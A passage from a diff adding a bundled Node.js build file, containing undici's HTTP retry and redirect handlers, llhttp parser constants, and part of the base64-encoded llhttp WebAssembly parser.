== null) { + return this.handler.onHeaders( + statusCode, + rawHeaders, + resume, + statusMessage + ) + } + + const { start, size, end = size } = range + + assert( + start != null && Number.isFinite(start) && this.start !== start, + 'content-range mismatch' + ) + assert(Number.isFinite(start)) + assert( + end != null && Number.isFinite(end) && this.end !== end, + 'invalid content-length' + ) + + this.start = start + this.end = end + } + + // We make our best to checkpoint the body for further range headers + if (this.end == null) { + const contentLength = headers['content-length'] + this.end = contentLength != null ? Number(contentLength) : null + } + + assert(Number.isFinite(this.start)) + assert( + this.end == null || Number.isFinite(this.end), + 'invalid content-length' + ) + + this.resume = resume + this.etag = headers.etag != null ? headers.etag : null + + return this.handler.onHeaders( + statusCode, + rawHeaders, + resume, + statusMessage + ) + } + + const err = new RequestRetryError('Request failed', statusCode, { + headers, + count: this.retryCount + }) + + this.abort(err) + + return false + } + + onData (chunk) { + this.start += chunk.length + + return this.handler.onData(chunk) + } + + onComplete (rawTrailers) { + this.retryCount = 0 + return this.handler.onComplete(rawTrailers) + } + + onError (err) { + if (this.aborted || isDisturbed(this.opts.body)) { + return this.handler.onError(err) + } + + this.retryOpts.retry( + err, + { + state: { counter: this.retryCount++, currentTimeout: this.retryAfter }, + opts: { retryOptions: this.retryOpts, ...this.opts } + }, + onRetry.bind(this) + ) + + function onRetry (err) { + if (err != null || this.aborted || isDisturbed(this.opts.body)) { + return this.handler.onError(err) + } + + if (this.start !== 0) { + this.opts = { + ...this.opts, + headers: { + ...this.opts.headers, + range: `bytes=${this.start}-${this.end ?? ''}` + } + } + } + + try { + this.dispatch(this.opts, this) + } catch (err) { + this.handler.onError(err) + } + } + } +} + +module.exports = RetryHandler + + +/***/ }), + +/***/ 8861: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const RedirectHandler = __nccwpck_require__(2860) + +function createRedirectInterceptor ({ maxRedirections: defaultMaxRedirections }) { + return (dispatch) => { + return function Intercept (opts, handler) { + const { maxRedirections = defaultMaxRedirections } = opts + + if (!maxRedirections) { + return dispatch(opts, handler) + } + + const redirectHandler = new RedirectHandler(dispatch, maxRedirections, opts, handler) + opts = { ...opts, maxRedirections: 0 } // Stop sub dispatcher from also redirecting. + return dispatch(opts, redirectHandler) + } + } +} + +module.exports = createRedirectInterceptor + + +/***/ }), + +/***/ 953: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.SPECIAL_HEADERS = exports.HEADER_STATE = exports.MINOR = exports.MAJOR = exports.CONNECTION_TOKEN_CHARS = exports.HEADER_CHARS = exports.TOKEN = exports.STRICT_TOKEN = exports.HEX = exports.URL_CHAR = exports.STRICT_URL_CHAR = exports.USERINFO_CHARS = exports.MARK = exports.ALPHANUM = exports.NUM = exports.HEX_MAP = exports.NUM_MAP = exports.ALPHA = exports.FINISH = exports.H_METHOD_MAP = exports.METHOD_MAP = exports.METHODS_RTSP = exports.METHODS_ICE = exports.METHODS_HTTP = exports.METHODS = exports.LENIENT_FLAGS = exports.FLAGS = exports.TYPE = exports.ERROR = void 0; +const utils_1 = __nccwpck_require__(1891); +// C headers +var ERROR; +(function (ERROR) { + ERROR[ERROR["OK"] = 0] = "OK"; + ERROR[ERROR["INTERNAL"] = 1] = "INTERNAL"; + ERROR[ERROR["STRICT"] = 2] = "STRICT"; + ERROR[ERROR["LF_EXPECTED"] = 3] = "LF_EXPECTED"; + ERROR[ERROR["UNEXPECTED_CONTENT_LENGTH"] = 4] = "UNEXPECTED_CONTENT_LENGTH"; + ERROR[ERROR["CLOSED_CONNECTION"] = 5] = "CLOSED_CONNECTION"; + ERROR[ERROR["INVALID_METHOD"] = 6] = "INVALID_METHOD"; + ERROR[ERROR["INVALID_URL"] = 7] = "INVALID_URL"; + ERROR[ERROR["INVALID_CONSTANT"] = 8] = "INVALID_CONSTANT"; + ERROR[ERROR["INVALID_VERSION"] = 9] = "INVALID_VERSION"; + ERROR[ERROR["INVALID_HEADER_TOKEN"] = 10] = "INVALID_HEADER_TOKEN"; + ERROR[ERROR["INVALID_CONTENT_LENGTH"] = 11] = "INVALID_CONTENT_LENGTH"; + ERROR[ERROR["INVALID_CHUNK_SIZE"] = 12] = "INVALID_CHUNK_SIZE"; + ERROR[ERROR["INVALID_STATUS"] = 13] = "INVALID_STATUS"; + ERROR[ERROR["INVALID_EOF_STATE"] = 14] = "INVALID_EOF_STATE"; + ERROR[ERROR["INVALID_TRANSFER_ENCODING"] = 15] = "INVALID_TRANSFER_ENCODING"; + ERROR[ERROR["CB_MESSAGE_BEGIN"] = 16] = "CB_MESSAGE_BEGIN"; + ERROR[ERROR["CB_HEADERS_COMPLETE"] = 17] = "CB_HEADERS_COMPLETE"; + ERROR[ERROR["CB_MESSAGE_COMPLETE"] = 18] = "CB_MESSAGE_COMPLETE"; + ERROR[ERROR["CB_CHUNK_HEADER"] = 19] = "CB_CHUNK_HEADER"; + ERROR[ERROR["CB_CHUNK_COMPLETE"] = 20] = "CB_CHUNK_COMPLETE"; + ERROR[ERROR["PAUSED"] = 21] = "PAUSED"; + ERROR[ERROR["PAUSED_UPGRADE"] = 22] = "PAUSED_UPGRADE"; + ERROR[ERROR["PAUSED_H2_UPGRADE"] = 23] = "PAUSED_H2_UPGRADE"; + ERROR[ERROR["USER"] = 24] = "USER"; +})(ERROR = exports.ERROR || (exports.ERROR = {})); +var TYPE; +(function (TYPE) { + TYPE[TYPE["BOTH"] = 0] = "BOTH"; + TYPE[TYPE["REQUEST"] = 1] = "REQUEST"; + TYPE[TYPE["RESPONSE"] = 2] = "RESPONSE"; +})(TYPE = exports.TYPE || (exports.TYPE = {})); +var FLAGS; +(function (FLAGS) { + FLAGS[FLAGS["CONNECTION_KEEP_ALIVE"] = 1] = "CONNECTION_KEEP_ALIVE"; + FLAGS[FLAGS["CONNECTION_CLOSE"] = 2] = "CONNECTION_CLOSE"; + FLAGS[FLAGS["CONNECTION_UPGRADE"] = 4] = "CONNECTION_UPGRADE"; + FLAGS[FLAGS["CHUNKED"] = 8] = "CHUNKED"; + FLAGS[FLAGS["UPGRADE"] = 16] = "UPGRADE"; + FLAGS[FLAGS["CONTENT_LENGTH"] = 32] = "CONTENT_LENGTH"; + FLAGS[FLAGS["SKIPBODY"] = 64] = "SKIPBODY"; + FLAGS[FLAGS["TRAILING"] = 128] = "TRAILING"; + // 1 << 8 is unused + FLAGS[FLAGS["TRANSFER_ENCODING"] = 512] = "TRANSFER_ENCODING"; +})(FLAGS = exports.FLAGS || (exports.FLAGS = {})); +var LENIENT_FLAGS; +(function (LENIENT_FLAGS) { + LENIENT_FLAGS[LENIENT_FLAGS["HEADERS"] = 1] = "HEADERS"; + LENIENT_FLAGS[LENIENT_FLAGS["CHUNKED_LENGTH"] = 2] = "CHUNKED_LENGTH"; + LENIENT_FLAGS[LENIENT_FLAGS["KEEP_ALIVE"] = 4] = "KEEP_ALIVE"; +})(LENIENT_FLAGS = exports.LENIENT_FLAGS || (exports.LENIENT_FLAGS = {})); +var METHODS; +(function (METHODS) { + METHODS[METHODS["DELETE"] = 0] = "DELETE"; + METHODS[METHODS["GET"] = 1] = "GET"; + METHODS[METHODS["HEAD"] = 2] = "HEAD"; + METHODS[METHODS["POST"] = 3] = "POST"; + METHODS[METHODS["PUT"] = 4] = "PUT"; + /* pathological */ + METHODS[METHODS["CONNECT"] = 5] = "CONNECT"; + METHODS[METHODS["OPTIONS"] = 6] = "OPTIONS"; + METHODS[METHODS["TRACE"] = 7] = "TRACE"; + /* WebDAV */ + METHODS[METHODS["COPY"] = 8] = "COPY"; + METHODS[METHODS["LOCK"] = 9] = "LOCK"; + METHODS[METHODS["MKCOL"] = 10] = "MKCOL"; + METHODS[METHODS["MOVE"] = 11] = "MOVE"; + METHODS[METHODS["PROPFIND"] = 12] = "PROPFIND"; + METHODS[METHODS["PROPPATCH"] = 13] = "PROPPATCH"; + METHODS[METHODS["SEARCH"] = 14] = "SEARCH"; + METHODS[METHODS["UNLOCK"] = 15] = "UNLOCK"; + METHODS[METHODS["BIND"] = 16] = "BIND"; + METHODS[METHODS["REBIND"] = 17] = "REBIND"; + METHODS[METHODS["UNBIND"] = 18] = "UNBIND"; + METHODS[METHODS["ACL"] = 19] = "ACL"; + /* subversion */ + METHODS[METHODS["REPORT"] = 20] = "REPORT"; + METHODS[METHODS["MKACTIVITY"] = 21] = "MKACTIVITY"; + METHODS[METHODS["CHECKOUT"] = 22] = "CHECKOUT"; + METHODS[METHODS["MERGE"] = 23] = "MERGE"; + /* upnp */ + METHODS[METHODS["M-SEARCH"] = 24] = "M-SEARCH"; + METHODS[METHODS["NOTIFY"] = 25] = "NOTIFY"; + METHODS[METHODS["SUBSCRIBE"] = 26] = "SUBSCRIBE"; + METHODS[METHODS["UNSUBSCRIBE"] = 27] = "UNSUBSCRIBE"; + /* RFC-5789 */ + METHODS[METHODS["PATCH"] = 28] = "PATCH"; + METHODS[METHODS["PURGE"] = 29] = "PURGE"; + /* CalDAV */ + METHODS[METHODS["MKCALENDAR"] = 30] = "MKCALENDAR"; + /* RFC-2068, section 19.6.1.2 */ + METHODS[METHODS["LINK"] = 31] = "LINK"; + METHODS[METHODS["UNLINK"] = 32] = "UNLINK"; + /* icecast */ + METHODS[METHODS["SOURCE"] = 33] = "SOURCE"; + /* RFC-7540, section 11.6 */ + METHODS[METHODS["PRI"] = 34] = "PRI"; + /* RFC-2326 RTSP */ + METHODS[METHODS["DESCRIBE"] = 35] = "DESCRIBE"; + METHODS[METHODS["ANNOUNCE"] = 36] = "ANNOUNCE"; + METHODS[METHODS["SETUP"] = 37] = "SETUP"; + METHODS[METHODS["PLAY"] = 38] = "PLAY"; + METHODS[METHODS["PAUSE"] = 39] = "PAUSE"; + METHODS[METHODS["TEARDOWN"] = 40] = "TEARDOWN"; + METHODS[METHODS["GET_PARAMETER"] = 41] = "GET_PARAMETER"; + METHODS[METHODS["SET_PARAMETER"] = 42] = "SET_PARAMETER"; + METHODS[METHODS["REDIRECT"] = 43] = "REDIRECT"; + METHODS[METHODS["RECORD"] = 44] = "RECORD"; + /* RAOP */ + METHODS[METHODS["FLUSH"] = 45] = "FLUSH"; +})(METHODS = exports.METHODS || (exports.METHODS = {})); +exports.METHODS_HTTP = [ + METHODS.DELETE, + METHODS.GET, + METHODS.HEAD, + METHODS.POST, + METHODS.PUT, + METHODS.CONNECT, + METHODS.OPTIONS, + METHODS.TRACE, + METHODS.COPY, + METHODS.LOCK, + METHODS.MKCOL, + METHODS.MOVE, + METHODS.PROPFIND, + METHODS.PROPPATCH, + METHODS.SEARCH, + METHODS.UNLOCK, + METHODS.BIND, + METHODS.REBIND, + METHODS.UNBIND, + METHODS.ACL, + METHODS.REPORT, + METHODS.MKACTIVITY, + METHODS.CHECKOUT, + METHODS.MERGE, + METHODS['M-SEARCH'], + METHODS.NOTIFY, + METHODS.SUBSCRIBE, + METHODS.UNSUBSCRIBE, + METHODS.PATCH, + METHODS.PURGE, + METHODS.MKCALENDAR, + METHODS.LINK, + METHODS.UNLINK, + METHODS.PRI, + // TODO(indutny): should we allow it with HTTP? + METHODS.SOURCE, +]; +exports.METHODS_ICE = [ + METHODS.SOURCE, +]; +exports.METHODS_RTSP = [ + METHODS.OPTIONS, + METHODS.DESCRIBE, + METHODS.ANNOUNCE, + METHODS.SETUP, + METHODS.PLAY, + METHODS.PAUSE, + METHODS.TEARDOWN, + METHODS.GET_PARAMETER, + METHODS.SET_PARAMETER, + METHODS.REDIRECT, + METHODS.RECORD, + METHODS.FLUSH, + // For AirPlay + METHODS.GET, + METHODS.POST, +]; +exports.METHOD_MAP = utils_1.enumToMap(METHODS); +exports.H_METHOD_MAP = {}; +Object.keys(exports.METHOD_MAP).forEach((key) => { + if (/^H/.test(key)) { + exports.H_METHOD_MAP[key] = exports.METHOD_MAP[key]; + } +}); +var FINISH; +(function (FINISH) { + FINISH[FINISH["SAFE"] = 0] = "SAFE"; + FINISH[FINISH["SAFE_WITH_CB"] = 1] = "SAFE_WITH_CB"; + FINISH[FINISH["UNSAFE"] = 2] = "UNSAFE"; +})(FINISH = exports.FINISH || (exports.FINISH = {})); +exports.ALPHA = []; +for (let i = 'A'.charCodeAt(0); i <= 'Z'.charCodeAt(0); i++) { + // Upper case + exports.ALPHA.push(String.fromCharCode(i)); + // Lower case + exports.ALPHA.push(String.fromCharCode(i + 0x20)); +} +exports.NUM_MAP = { + 0: 0, 1: 1, 2: 2, 3: 3, 4: 4, + 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, +}; +exports.HEX_MAP = { + 0: 0, 1: 1, 2: 2, 3: 3, 4: 4, + 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, + A: 0XA, B: 0XB, C: 0XC, D: 0XD, E: 0XE, F: 0XF, + a: 0xa, b: 0xb, c: 0xc, d: 0xd, e: 0xe, f: 0xf, +}; +exports.NUM = [ + '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', +]; +exports.ALPHANUM = exports.ALPHA.concat(exports.NUM); +exports.MARK = ['-', '_', '.', '!', '~', '*', '\'', '(', ')']; +exports.USERINFO_CHARS = exports.ALPHANUM + .concat(exports.MARK) + .concat(['%', ';', ':', '&', '=', '+', '$', ',']); +// TODO(indutny): use RFC +exports.STRICT_URL_CHAR = [ + '!', '"', '$', '%', '&', '\'', + '(', ')', '*', '+', ',', '-', '.', '/', + ':', ';', '<', '=', '>', + '@', '[', '\\', ']', '^', '_', + '`', + '{', '|', '}', '~', +].concat(exports.ALPHANUM); +exports.URL_CHAR = exports.STRICT_URL_CHAR + .concat(['\t', '\f']); +// All characters with 0x80 bit set to 1 +for (let i = 0x80; i <= 0xff; i++) { + exports.URL_CHAR.push(i); +} +exports.HEX = exports.NUM.concat(['a', 'b', 'c', 'd', 'e', 'f', 'A', 'B', 'C', 'D', 'E', 'F']); +/* Tokens as defined by rfc 2616. Also lowercases them. + * token = 1* + * separators = "(" | ")" | "<" | ">" | "@" + * | "," | ";" | ":" | "\" | <"> + * | "/" | "[" | "]" | "?" | "=" + * | "{" | "}" | SP | HT + */ +exports.STRICT_TOKEN = [ + '!', '#', '$', '%', '&', '\'', + '*', '+', '-', '.', + '^', '_', '`', + '|', '~', +].concat(exports.ALPHANUM); +exports.TOKEN = exports.STRICT_TOKEN.concat([' ']); +/* + * Verify that a char is a valid visible (printable) US-ASCII + * character or %x80-FF + */ +exports.HEADER_CHARS = ['\t']; +for (let i = 32; i <= 255; i++) { + if (i !== 127) { + exports.HEADER_CHARS.push(i); + } +} +// ',' = \x44 +exports.CONNECTION_TOKEN_CHARS = exports.HEADER_CHARS.filter((c) => c !== 44); +exports.MAJOR = exports.NUM_MAP; +exports.MINOR = exports.MAJOR; +var HEADER_STATE; +(function (HEADER_STATE) { + HEADER_STATE[HEADER_STATE["GENERAL"] = 0] = "GENERAL"; + HEADER_STATE[HEADER_STATE["CONNECTION"] = 1] = "CONNECTION"; + HEADER_STATE[HEADER_STATE["CONTENT_LENGTH"] = 2] = "CONTENT_LENGTH"; + HEADER_STATE[HEADER_STATE["TRANSFER_ENCODING"] = 3] = "TRANSFER_ENCODING"; + HEADER_STATE[HEADER_STATE["UPGRADE"] = 4] = "UPGRADE"; + HEADER_STATE[HEADER_STATE["CONNECTION_KEEP_ALIVE"] = 5] = "CONNECTION_KEEP_ALIVE"; + HEADER_STATE[HEADER_STATE["CONNECTION_CLOSE"] = 6] = "CONNECTION_CLOSE"; + HEADER_STATE[HEADER_STATE["CONNECTION_UPGRADE"] = 7] = "CONNECTION_UPGRADE"; + HEADER_STATE[HEADER_STATE["TRANSFER_ENCODING_CHUNKED"] = 8] = "TRANSFER_ENCODING_CHUNKED"; +})(HEADER_STATE = exports.HEADER_STATE || (exports.HEADER_STATE = {})); +exports.SPECIAL_HEADERS = { + 'connection': HEADER_STATE.CONNECTION, + 'content-length': HEADER_STATE.CONTENT_LENGTH, + 'proxy-connection': HEADER_STATE.CONNECTION, + 'transfer-encoding': HEADER_STATE.TRANSFER_ENCODING, + 'upgrade': HEADER_STATE.UPGRADE, +}; +//# sourceMappingURL=constants.js.map + +/***/ }), + +/***/ 1145: +/***/ ((module) => { + +module.exports = 'AGFzbQEAAAABMAhgAX8Bf2ADf39/AX9gBH9/f38Bf2AAAGADf39/AGABfwBgAn9/AGAGf39/f39/AALLAQgDZW52GHdhc21fb25faGVhZGVyc19jb21wbGV0ZQACA2VudhV3YXNtX29uX21lc3NhZ2VfYmVnaW4AAANlbnYLd2FzbV9vbl91cmwAAQNlbnYOd2FzbV9vbl9zdGF0dXMAAQNlbnYUd2FzbV9vbl9oZWFkZXJfZmllbGQAAQNlbnYUd2FzbV9vbl9oZWFkZXJfdmFsdWUAAQNlbnYMd2FzbV9vbl9ib2R5AAEDZW52GHdhc21fb25fbWVzc2FnZV9jb21wbGV0ZQAAA0ZFAwMEAAAFAAAAAAAABQEFAAUFBQAABgAAAAAGBgYGAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQABAAABAQcAAAUFAwABBAUBcAESEgUDAQACBggBfwFBgNQECwfRBSIGbWVtb3J5AgALX2luaXRpYWxpemUACRlfX2luZGlyZWN0X2Z1bmN0aW9uX3RhYmxlAQALbGxodHRwX2luaXQAChhsbGh0dHBfc2hvdWxkX2tlZXBfYWxpdmUAQQxsbGh0dHBfYWxsb2MADAZtYWxsb2MARgtsbGh0dHBfZnJlZQANBGZyZWUASA9sbGh0dHBfZ2V0X3R5cGUADhVsbGh0dHBfZ2V0X2h0dHBfbWFqb3IADxVsbGh0dHBfZ2V0X2h0dHBfbWlub3IAEBFsbGh0dHBfZ2V0X21ldGhvZAARFmxsaHR0cF9nZXRfc3RhdHVzX2NvZGUAEhJsbGh0dHBfZ2V0X3VwZ3JhZGUAEwxsbGh0dHBfcmVzZXQAFA5sbGh0dHBfZXhlY3V0ZQAVFGxsaHR0cF9zZXR0aW5nc19pbml0ABYNbGxodHRwX2ZpbmlzaAAXDGxsaHR0cF9wYXVzZQAYDWxsaHR0cF9yZXN1bWUAGRtsbGh0dHBfcmVzdW1lX2FmdGVyX3VwZ3JhZGUAGhBsbGh0dHBfZ2V0X2Vycm5vABsXbGxodHRwX2dldF9lcnJvcl9yZWFzb24AHBdsbGh0dHBfc2V0X2Vycm9yX3JlYXNvbgAdFGxsaHR0cF9nZXRfZXJyb3JfcG9zAB4RbGxodHRwX2Vycm5vX25hbWUAHxJsbGh0dHBfbWV0aG9kX25hbWUAIBJsbGh0dHBfc3RhdHVzX25hbWUAIRpsbGh0dHBfc2V0X2xlbmllbnRfaGVhZGVycwAiIWxsaHR0cF9zZXRfbGVuaWVudF9jaHVua2VkX2xlbmd0aAAjHWxsaHR0cF9zZXRfbGVuaWVudF9rZWVwX2FsaXZlACQkbGxodHRwX3NldF9sZW5pZW50X3RyYW5zZmVyX2VuY29kaW5nACUYbGxodHRwX21lc3NhZ2VfbmVlZHNfZW9mAD8JFwEAQQELEQECAwQFCwYHNTk3MS8tJyspCsLgAkUCAAsIABCIgICAAAsZACAAEMKAgIAAGiAAIAI2AjggACABOgAoCxwAIAAgAC8BMiAALQAuIAAQwYCAgAAQgICAgAALKgEBf0HAABDGgICAACIBEMKAgIAAGiABQYCIgIAANgI4IAEgADoAKCABCwoAIAAQyICAgAALBwAgAC0AKAsHACAALQAqCwcAIAAtACsLBwAgAC0AKQsHACAALwEyCwcAIAAtAC4LRQEEfyAAKAIYIQEgAC0ALSECIAAtACghAyAAKAI4IQQgABDCgICAABogACAENgI4IAAgAzoAKCAAIAI6AC0gACABNgIYCxEAIAAgASABIAJqEMOAgIAACxAAIABBAEHcABDMgICAABoLZwEBf0EAIQECQCAAKAIMDQACQAJAAkACQCAALQAvDgMBAAMCCyAAKAI4IgFFDQAgASgCLCIBRQ0AIAAgARGAgICAAAAiAQ0DC0EADwsQyoCAgAAACyAAQcOWgIAANgIQQQ4hAQsgAQseAAJAIAAoAgwNACAAQdGbgIAANgIQIABBFTYCDAsLFgACQCAAKAIMQRVHDQAgAEEANgIMCwsWAAJAIAAoAgxBFkcNACAAQQA2AgwLCwcAIAAoAgwLBwAgACgCEAsJACAAIAE2AhALBwAgACgCFAsiAAJAIABBJEkNABDKgICAAAALIABBAnRBoLOAgABqKAIACyIAAkAgAEEuSQ0AEMqAgIAAAAsgAEECdEGwtICAAGooAgAL7gsBAX9B66iAgAAhAQJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAIABBnH9qDvQDY2IAAWFhYWFhYQIDBAVhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhBgcICQoLDA0OD2FhYWFhEGFhYWFhYWFhYWFhEWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYRITFBUWFxgZGhthYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2YTc4OTphYWFhYWFhYTthYWE8YWFhYT0+P2FhYWFhYWFhQGFhQWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYUJDREVGR0hJSktMTU5PUFFSU2FhYWFhYWFhVFVWV1hZWlthXF1hYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFeYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhX2BhC0Hhp4CAAA8LQaShgIAADwtBy6yAgAAPC0H+sYCAAA8LQcCkgIAADwtBq6SAgAAPC0GNqICAAA8LQeKmgIAADwtBgLCAgAAPC0G5r4CAAA8LQdekgIAADwtB75+AgAAPC0Hhn4CAAA8LQfqfgIAADwtB8qCAgAAPC0Gor4CAAA8LQa6ygIAADwtBiLCAgAAPC0Hsp4CAAA8LQYKigIAADwtBjp2AgAAPC0HQroCAAA8LQcqjgIAADwtBxbKAgAAPC0HfnICAAA8LQdKcgIAADwtBxKCAgAAPC0HXoICAAA8LQaKfgIAADwtB7a6AgAAPC0GrsICAAA8LQdSlgIAADwtBzK6AgAAPC0H6roCAAA8LQfyrgIAADwtB0rCAgAAPC0HxnYCAAA8LQbuggIAADwtB96uAgAAPC0GQsYCAAA8LQdexgIAADwtBoq2AgAAPC0HUp4CAAA8LQeCrgIAADwtBn6yAgAAPC0HrsYCAAA8LQdWfgIAADwtByrGAgAAPC0HepYCAAA8LQdSegIAADwtB9JyAgAAPC0GnsoCAAA8LQbGdgIAADwtBoJ2AgAAPC0G5sYCAAA8LQbywgIAADwtBkqGAgAAPC0GzpoCAAA8LQemsgIAADwtBrJ6AgAAPC0HUq4CAAA8LQfemgIAADwtBgKaAgAAPC0GwoYCAAA8LQf6egIAADwtBjaOAgAAPC0GJrYCAAA8LQfeigIAADwtBoLGAgAAPC0Gun4CAAA8LQcalgIAADwtB6J6AgAAPC0GTooCAAA8LQcKvgIAADwtBw52AgAAPC0GLrICAAA8LQeGdgIAADwtBja+AgAAPC0HqoYCAAA8LQbStgIAADwtB0q+AgAAPC0HfsoCAAA8LQdKygIAADwtB8LCAgAAPC0GpooCAAA8LQfmjgIAADwtBmZ6AgAAPC0G1rICAAA8LQZuwgIAADwtBkrKAgAAPC0G2q4CAAA8LQcKigIAADwtB+LKAgAAPC0GepYCAAA8LQdCigIAADwtBup6AgAAPC0GBnoCAAA8LEMqAgIAAAAtB1qGAgAAhAQsgAQsWACAAIAAtAC1B/gFxIAFBAEdyOgAtCxkAIAAgAC0ALUH9AXEgAUEAR0EBdHI6AC0LGQAgACAALQAtQfsBcSABQQBHQQJ0cjoALQsZACAAIAAtAC1B9wFxIAFBAEdBA3RyOgAtCy4BAn9BACEDAkAgACgCOCIERQ0AIAQoAgAiBEUNACAAIAQRgICAgAAAIQMLIAMLSQECf0EAIQMCQCAAKAI4IgRFDQAgBCgCBCIERQ0AIAAgASACIAFrIAQRgYCAgAAAIgNBf0cNACAAQcaRgIAANgIQQRghAwsgAwsuAQJ/QQAhAwJAIAAoAjgiBEUNACAEKAIwIgRFDQAgACAEEYCAgIAAACEDCyADC0kBAn9BACEDAkAgACgCOCIERQ0AIAQoAggiBEUNACAAIAEgAiABayAEEYGAgIAAACIDQX9HDQAgAEH2ioCAADYCEEEYIQMLIAMLLgECf0EAIQMCQCAAKAI4IgRFDQAgBCgCNCIERQ0AIAAgBBGAgICAAAAhAwsgAwtJAQJ/QQAhAwJAIAAoAjgiBEUNACAEKAIMIgRFDQAgACABIAIgAWsgBBGBgICAAAAiA0F/Rw0AIABB7ZqAgAA2AhBBGCEDCyADCy4BAn9BACEDAkAgACgCOCIERQ0AIAQoAjgiBEUNACAAIAQRgICAgAAAIQMLIAMLSQECf0EAIQMCQCAAKAI4IgRFDQAgBCgCECIERQ0AIAAgASACIAFrIAQRgYCAgAAAIgNBf0cNACAAQZWQgIAANgIQQRghAwsgAwsuAQJ/QQAhAwJAIAAoAjgiBEUNACAEKAI8IgRFDQAgACAEEYCAgIAAACEDCyADC0kBAn9BACEDAkAgACgCOCIERQ0AIAQoAhQiBEUNACAAIAEgAiABayAEEYGAgIAAACIDQX9HDQAgAEGqm4CAADYCEEEYIQMLIAMLLgECf0EAIQMCQCAAKAI4IgRFDQAgBCgCQCIERQ0AIAAgBBGAgICAAAAhAwsgAwtJAQJ/QQAhAwJAIAAoAjgiBEUNACAEKAIYIgRFDQAgACABIAIgAWsgBBGBgICAAAAiA0F/Rw0AIABB7ZOAgAA2AhBBGCEDCyADCy4BAn9BACEDAkAgACgCOCIERQ0AIAQoAkQiBEUNACAAIAQRgICAgAAAIQMLIAMLLgECf0EAIQMCQCAAKAI4IgRFDQAgBCgCJCIERQ0AIAAgBBGAgICAAAAhAwsgAwsuAQJ/QQAhAwJAIAAoAjgiBEUNACAEKAIsIgRFDQAgACAEEYCAgIAAACEDCyADC0kBAn9BACEDAkAgACgCOCIERQ0AIAQoAigiBEUNACAAIAEgAiABayAEEYGAgIAAACIDQX9HDQAgAEH2iICAADYCEEEYIQMLIAMLLgECf0EAIQMCQCAAKAI4IgRFDQAgBCgCUCIERQ0AIAAgBBGAgICAAAAhAwsgAwtJAQJ/QQAhAwJAIAAoAjgiBEUNACAEKAIcIgRFDQAgACABIAIgAWsgBBGBgICAAAAiA0F/Rw0AIABBwpmAgAA2AhBBGCEDCyADCy4BAn9BACEDAkAgACgCOCIERQ0AIAQoAkgiBEUNACAAIAQRgICAgAAAIQMLIAMLSQECf0EAIQMCQCAAKAI4IgRFDQAgBCgCICIERQ0AIAAgASACIAFrIAQRgYCAgAAAIgNBf0cNACAAQZSUgIAANgIQQRghAwsgAwsuAQJ/QQAhAwJAIAAoAjgiBEUNACAEKAJMIgRFDQAgACAEEYCAgIAAACEDCyADCy4BAn9BACEDAkAgACgCOCIERQ0AIAQoAlQiBEUNACAAIAQRgICAgAAAIQMLIAMLLgECf0EAIQMCQCAAKAI4IgRFDQAgBCgCWCIERQ0AIAAgBBGAgICAAAAhAwsgAwtFAQF/AkACQCAALwEwQRRxQRRHDQBBASEDIAAtAChBAUYNASAALwEyQeUARiEDDAELIAAtAClBBUYhAwsgACADOgAuQQAL/gEBA39BASEDAkAgAC8BMCIEQQhxDQAgACkDIEIAUiEDCwJAAkAgAC0ALkUNAEEBIQUgAC0AKUEFRg0BQQEhBSAEQcAAcUUgA3FBAUcNAQtBACEFIARBwABxDQBBAiEFIARB//8DcSIDQQhxDQACQCADQYAEcUUNAAJAIAAtAChBAUcNACAALQAtQQpxDQBBBQ8LQQQPCwJAIANBIHENAAJAIAAtAChBAUYNACAALwEyQf//A3EiAEGcf2pB5ABJDQAgAEHMAUYNACAAQbACRg0AQQQhBSAEQShxRQ0CIANBiARxQYAERg0CC0EADwtBAEEDIAApAyBQGyEFCyAFC2IBAn9BACEBAkAgAC0AKEEBRg0AIAAvATJB//8DcSICQZx/akHkAEkNACACQcwBRg0AIAJBsAJGDQAgAC8BMCIAQcAAcQ0AQQEhASAAQYgEcUGABEYNACAAQShxRSEBCyABC6cBAQN/AkACQAJAIAAtACpFDQAgAC0AK0UNAEEAIQMgAC8BMCIEQQJxRQ0BDAILQQAhAyAALwEwIgRBAXFFDQELQQEhAyAALQAoQQFGDQAgAC8BMkH//wNxIgVBnH9qQeQASQ0AIAVBzAFGDQAgBUGwAkYNACAEQcAAcQ0AQQAhAyAEQYgEcUGABEYNACAEQShxQQBHIQMLIABBADsBMCAAQQA6AC8gAwuZAQECfwJAAkACQCAALQAqRQ0AIAAtACtFDQBBACEBIAAvATAiAkECcUUNAQwCC0EAIQEgAC8BMCICQQFxRQ0BC0EBIQEgAC0AKEEBRg0AIAAvATJB//8DcSIAQZx/akHkAEkNACAAQcwBRg0AIABBsAJGDQAgAkHAAHENAEEAIQEgAkGIBHFBgARGDQAgAkEocUEARyEBCyABC1kAIABBGGpCADcDACAAQgA3AwAgAEE4akIANwMAIABBMGpCADcDACAAQShqQgA3AwAgAEEgakIANwMAIABBEGpCADcDACAAQ